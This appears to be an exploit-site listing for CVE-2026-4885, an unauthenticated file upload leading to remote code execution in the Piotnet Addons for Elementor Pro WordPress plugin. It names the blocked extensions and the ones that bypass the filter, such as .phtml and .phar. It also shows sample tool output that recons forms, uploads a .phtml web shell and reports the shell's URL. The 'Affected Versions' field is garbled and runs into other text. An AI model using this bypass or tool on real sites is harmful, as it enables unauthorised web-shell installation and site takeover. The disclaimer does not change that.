## https://sploitus.com/exploit?id=7377427E-6314-5CD0-B60E-F3E64B0C7D6D
# CVE-2026-4885
Piotnet Addons for Elementor Pro **Note:** The exploit can only be triggered if a file field is added to the Piotnet form.
---
# INFO : [**CVE-2026-4885**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/piotnet-addons-for-elementor-pro/piotnet-addons-for-elementor-pro-7170-unauthenticated-arbitrary-file-upload-via-form-file-upload)
~ **CVSS Score : 9.8 (Critical)**
~ **CVSS Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H**
~ **Affected Versions : **Blocked extensions:** `.php` `.phpt` `.php5` `.php7` `.exe`
>
> **Use instead:** `.phtml` `.phar` `.shtml` `.php8` etc.
---
### Output :
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ
โ โก CVE-2026-4885 โ
โ Piotnet Addons for Elementor Pro <= 7.1.70 โ
โ Unauthenticated File Upload โ RCE โ
โ โ
โ by Shadow & Friska โก โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โพโโโโ VERSION โโโโโผ
โก v7.1.67 <= 7.1.70 โ VULNERABLE
โพโโโโ RECON โโโโโผ
โ scanning 46 pages (parallel)...
โก [PIOTNET] https://target.com/contact
post_id=9 | form_id=72071c0
โ using : https://target.com/contact
โพโโโโ EXPLOIT โโโโโผ
โ post_id=9 | form_id=72071c0 | field=file
โถ trying .phtml ...
โก uploaded (.phtml)
โก URL leak : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ SHELL UPLOADED (.phtml) โ
โ โ
โ โ shell : https://target.com/wp-content/... โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
### Requirements :
```
pip install httpx
```
---
## Disclaimer :
This tool is for **educational and authorized security testing purposes only**.
Unauthorized use against systems you do not own or do not have explicit permission to test is **illegal**. The authors are not responsible for any misuse or damage caused by this tool.